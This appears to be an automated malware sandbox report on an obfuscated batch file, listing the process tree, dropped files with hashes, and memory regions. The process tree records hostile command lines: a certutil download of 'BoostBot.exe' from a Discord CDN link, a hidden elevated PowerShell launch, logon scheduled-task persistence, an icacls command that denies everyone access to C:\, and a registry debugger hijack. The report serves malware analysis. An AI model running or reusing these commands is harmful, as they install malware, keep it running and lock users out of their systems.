                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1744
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1752
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                      1⤵
                                                        PID:1852
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1864
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                          1⤵
                                                            PID:1900
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                            1⤵
                                                              PID:1960
                                                            • C:\Windows\System32\spoolsv.exe
                                                              C:\Windows\System32\spoolsv.exe
                                                              1⤵
                                                                PID:1524
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                                1⤵
                                                                  PID:2132
                                                                • C:\Windows\System32\svchost.exe
                                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                  1⤵
                                                                    PID:2232
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                    1⤵
                                                                      PID:2296
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                      1⤵
                                                                        PID:2304
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:2416
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                          PID:2424
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2508
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2524
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                              1⤵
                                                                                PID:2552
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                                1⤵
                                                                                  PID:2572
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                  1⤵
                                                                                    PID:2900
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                    1⤵
                                                                                      PID:668
                                                                                    • C:\Windows\system32\wbem\unsecapp.exe
                                                                                      C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                      1⤵
                                                                                        PID:2104
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                        1⤵
                                                                                          PID:3344
                                                                                        • C:\Windows\Explorer.EXE
                                                                                          C:\Windows\Explorer.EXE
                                                                                          1⤵
                                                                                          • Modifies registry class
                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:3436
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"
                                                                                            2⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:5116
                                                                                            • C:\Windows\system32\chcp.com
                                                                                              chcp.com 437
                                                                                              3⤵
                                                                                                PID:1784
                                                                                              • C:\Windows\system32\findstr.exe
                                                                                                findstr /L /I set "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"
                                                                                                3⤵
                                                                                                  PID:1516
                                                                                                • C:\Windows\system32\findstr.exe
                                                                                                  findstr /L /I goto "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"
                                                                                                  3⤵
                                                                                                    PID:3184
                                                                                                  • C:\Windows\system32\findstr.exe
                                                                                                    findstr /L /I echo "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"
                                                                                                    3⤵
                                                                                                      PID:4528
                                                                                                    • C:\Windows\system32\findstr.exe
                                                                                                      findstr /L /I pause "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"
                                                                                                      3⤵
                                                                                                        PID:1084
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c type tmp
                                                                                                        3⤵
                                                                                                          PID:4788
                                                                                                        • C:\Windows\system32\find.exe
                                                                                                          find
                                                                                                          3⤵
                                                                                                            PID:3544
                                                                                                          • C:\Windows\system32\find.exe
                                                                                                            find
                                                                                                            3⤵
                                                                                                              PID:2264
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c type tmp
                                                                                                              3⤵
                                                                                                                PID:3528
                                                                                                              • C:\Windows\system32\certutil.exe
                                                                                                                certutil -urlcache -split -f "https://cdn.discordapp.com/attachments/1237881664131174481/1239282786335064204/BoostBot.exe?ex=66425b89&is=66410a09&hm=76121e524db94e51397af0fa52812c443a6cb5a194da52bb2909deb394f90aee&" BoostBot.exe
                                                                                                                3⤵
                                                                                                                  PID:4508
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Start-Process -FilePath 'BoostBot.exe' -Verb RunAs"
                                                                                                                  3⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                  PID:1604
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe"
                                                                                                                    4⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:2672
                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                      "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\BoostBot.exe" /rl HIGHEST /f
                                                                                                                      5⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:2324
                                                                                                                    • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                                                      5⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:5012
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                                                        6⤵
                                                                                                                        • Creates scheduled task(s)
                                                                                                                        PID:3096
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5008
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        "schtasks" /delete /tn "$sxr-powershell" /f
                                                                                                                        6⤵
                                                                                                                          PID:3236
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            7⤵
                                                                                                                              PID:1840
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ksSpuRqAVYRn.bat" "
                                                                                                                            6⤵
                                                                                                                              PID:3808
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                7⤵
                                                                                                                                  PID:4056
                                                                                                                                • C:\Windows\SysWOW64\chcp.com
                                                                                                                                  chcp 65001
                                                                                                                                  7⤵
                                                                                                                                    PID:1716
                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                    ping -n 10 localhost
                                                                                                                                    7⤵
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:2040
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                                                  6⤵
                                                                                                                                    PID:4956
                                                                                                                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                                                    "SCHTASKS.exe" /create /tn "$77$sxr-powershell.exe" /tr "'C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe'" /sc onlogon /rl HIGHEST
                                                                                                                                    6⤵
                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                    PID:1504
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:2244
                                                                                                                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                                                  "SCHTASKS.exe" /create /tn "$77BoostBot.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\BoostBot.exe'" /sc onlogon /rl HIGHEST
                                                                                                                                  5⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:3600
                                                                                                                            • C:\Windows\system32\icacls.exe
                                                                                                                              icacls "C:\" /deny *S-1-1-0:(OI)(CI)F /T
                                                                                                                              3⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:3664
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Executable File Execution Options\cmd.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f
                                                                                                                              3⤵
                                                                                                                                PID:3656
                                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                                attrib +h "C:\Users\Admin\AppData\Local\Temp\Fixer-obf (1).bat"
                                                                                                                                3⤵
                                                                                                                                • Views/modifies file attributes
                                                                                                                                PID:3980
                                                                                                                            • C:\Windows\system32\notepad.exe
                                                                                                                              "C:\Windows\system32\notepad.exe"
                                                                                                                              2⤵
                                                                                                                                PID:2852
                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                              C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                              1⤵
                                                                                                                                PID:3580
                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                1⤵
                                                                                                                                  PID:3760
                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                  1⤵
                                                                                                                                    PID:3912
                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:696
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                    1⤵
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:3244
                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:3628
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                      1⤵
                                                                                                                                        PID:1320
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                        1⤵
                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                        PID:5064
                                                                                                                                      • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                        "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                        1⤵
                                                                                                                                          PID:1004
                                                                                                                                        • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                          C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                          1⤵
                                                                                                                                            PID:4092
                                                                                                                                          • C:\Windows\System32\svchost.exe
                                                                                                                                            C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                            1⤵
                                                                                                                                              PID:4628
                                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                              1⤵
                                                                                                                                                PID:4912
                                                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:1952
                                                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                  1⤵
                                                                                                                                                    PID:2768
                                                                                                                                                  • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                                    C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3240
                                                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      PID:976
                                                                                                                                                    • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                      C:\Windows\System32\WaaSMedicAgent.exe 8c29ba0b1ea5f00a08eef5227ff772e8 cBtgpcY4hEqlj0f3kK09zw.0.1.0.0.0
                                                                                                                                                      1⤵
                                                                                                                                                      • Sets service image path in registry
                                                                                                                                                      PID:2356
                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2184
                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                        1⤵
                                                                                                                                                          PID:4812
                                                                                                                                                        • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                          C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:64
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4868
                                                                                                                                                            • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                                              C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                                              1⤵
                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                              • Enumerates system info in registry
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              PID:4432
                                                                                                                                                            • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                              "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1136
                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2884
                                                                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2332
                                                                                                                                                                  • C:\Windows\system32\DllHost.exe
                                                                                                                                                                    C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:1216

                                                                                                                                                                    Network

                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                    Replay Monitor

                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                    Downloads

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BoostBot.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      409KB

                                                                                                                                                                      MD5

                                                                                                                                                                      404ab800bbe49c36bd64d0d73600b59a

                                                                                                                                                                      SHA1

                                                                                                                                                                      4c8dff2702fada108f7477ad357067310b584366

                                                                                                                                                                      SHA256

                                                                                                                                                                      5465f02f24ee5c1fc9c9c27c86c209eeddc2ed607143e1b76ca9c9d9b7b84154

                                                                                                                                                                      SHA512

                                                                                                                                                                      d0ecd88adfd84d9d8e845281e0437368aadf3d1d6fb704d7c7630d1360697471c2a49584f968eeebd5b435f11af9ce3d06327f1835fa5d07a140f22c0f95fc11

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmlr1gvh.puu.ps1

                                                                                                                                                                      Filesize

                                                                                                                                                                      60B

                                                                                                                                                                      MD5

                                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                      SHA1

                                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                      SHA256

                                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                      SHA512

                                                                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\install.exe

                                                                                                                                                                      Filesize

                                                                                                                                                                      162KB

                                                                                                                                                                      MD5

                                                                                                                                                                      152e3f07bbaf88fb8b097ba05a60df6e

                                                                                                                                                                      SHA1

                                                                                                                                                                      c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

                                                                                                                                                                      SHA256

                                                                                                                                                                      a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

                                                                                                                                                                      SHA512

                                                                                                                                                                      2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ksSpuRqAVYRn.bat

                                                                                                                                                                      Filesize

                                                                                                                                                                      283B

                                                                                                                                                                      MD5

                                                                                                                                                                      0f3766ba648da74f5cdc9013218a7661

                                                                                                                                                                      SHA1

                                                                                                                                                                      d58581a95ff6b657201d6958b28b7cbbcfd4f9be

                                                                                                                                                                      SHA256

                                                                                                                                                                      d9b25238fdfdfd731bcc69318844e147b02d9c1e27caff03dc53eb162d9661b0

                                                                                                                                                                      SHA512

                                                                                                                                                                      f6597e10eeaea0b24c6e2a20f0f2c0a6d879da0ac694009b77d5d18d1c2a6e0b4500e1a3182b5e5182a7b24d83177520b0845b41fc47d07e018dd58a4f8ec19a

                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\tmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      14B

                                                                                                                                                                      MD5

                                                                                                                                                                      ce585c6ba32ac17652d2345118536f9c

                                                                                                                                                                      SHA1

                                                                                                                                                                      be0e41b3690c42e4c0cdb53d53fc544fb46b758d

                                                                                                                                                                      SHA256

                                                                                                                                                                      589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3

                                                                                                                                                                      SHA512

                                                                                                                                                                      d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752

                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      8abf2d6067c6f3191a015f84aa9b6efe

                                                                                                                                                                      SHA1

                                                                                                                                                                      98f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7

                                                                                                                                                                      SHA256

                                                                                                                                                                      ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea

                                                                                                                                                                      SHA512

                                                                                                                                                                      c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63

                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      f313c5b4f95605026428425586317353

                                                                                                                                                                      SHA1

                                                                                                                                                                      06be66fa06e1cffc54459c38d3d258f46669d01a

                                                                                                                                                                      SHA256

                                                                                                                                                                      129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                                                                      SHA512

                                                                                                                                                                      b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                                                                      SHA1

                                                                                                                                                                      63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                                                                      SHA256

                                                                                                                                                                      727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                                                                      SHA512

                                                                                                                                                                      f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                                                                      SHA1

                                                                                                                                                                      5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                                                                      SHA256

                                                                                                                                                                      55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                                                                      SHA512

                                                                                                                                                                      5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      0b990e24f1e839462c0ac35fef1d119e

                                                                                                                                                                      SHA1

                                                                                                                                                                      9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                                                                      SHA256

                                                                                                                                                                      a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                                                                      SHA512

                                                                                                                                                                      c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                      Filesize

                                                                                                                                                                      2KB

                                                                                                                                                                      MD5

                                                                                                                                                                      2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                                      SHA1

                                                                                                                                                                      445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                                      SHA256

                                                                                                                                                                      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                                      SHA512

                                                                                                                                                                      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      MD5

                                                                                                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                      SHA1

                                                                                                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                      SHA256

                                                                                                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                      SHA512

                                                                                                                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                      Filesize

                                                                                                                                                                      1KB

                                                                                                                                                                      MD5

                                                                                                                                                                      39e7335d6b27147ba82cebb03f348f45

                                                                                                                                                                      SHA1

                                                                                                                                                                      d340283071e106cefd111b6c0058b7ea7f2ee38c

                                                                                                                                                                      SHA256

                                                                                                                                                                      88809d8a5e6ae13b10633539ec5eee82aaf0f5cdc2dfb06547413aec2c59ce4a

                                                                                                                                                                      SHA512

                                                                                                                                                                      f348639c7b203c96ca60328270d938c39f1a6c4246ee74610033cba8fb04979407df07f9067acdde897026bf1315093b1d8e08691ce64dc5c3ac586e1a2cc527

                                                                                                                                                                    • memory/332-115-0x00000226AD5A0000-0x00000226AD5CB000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

                                                                                                                                                                    • memory/332-121-0x00000226AD5A0000-0x00000226AD5CB000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

                                                                                                                                                                    • memory/332-122-0x00007FFAFC930000-0x00007FFAFC940000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      64KB

                                                                                                                                                                    • memory/516-126-0x000001CDB5D80000-0x000001CDB5DAB000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

                                                                                                                                                                    • memory/616-82-0x000001383C480000-0x000001383C4AB000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

                                                                                                                                                                    • memory/616-81-0x000001383C480000-0x000001383C4AB000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

                                                                                                                                                                    • memory/616-89-0x00007FFAFC930000-0x00007FFAFC940000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      64KB

                                                                                                                                                                    • memory/616-80-0x000001383C450000-0x000001383C475000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      148KB

                                                                                                                                                                    • memory/616-88-0x000001383C480000-0x000001383C4AB000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

                                                                                                                                                                    • memory/672-93-0x00000246BD170000-0x00000246BD19B000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

                                                                                                                                                                    • memory/672-100-0x00007FFAFC930000-0x00007FFAFC940000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      64KB

                                                                                                                                                                    • memory/672-99-0x00000246BD170000-0x00000246BD19B000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

                                                                                                                                                                    • memory/952-111-0x00007FFAFC930000-0x00007FFAFC940000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      64KB

                                                                                                                                                                    • memory/952-110-0x000001F20C4D0000-0x000001F20C4FB000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

                                                                                                                                                                    • memory/952-104-0x000001F20C4D0000-0x000001F20C4FB000-memory.dmp

                                                                                                                                                                      Filesize

                                                                                                                                                                      172KB

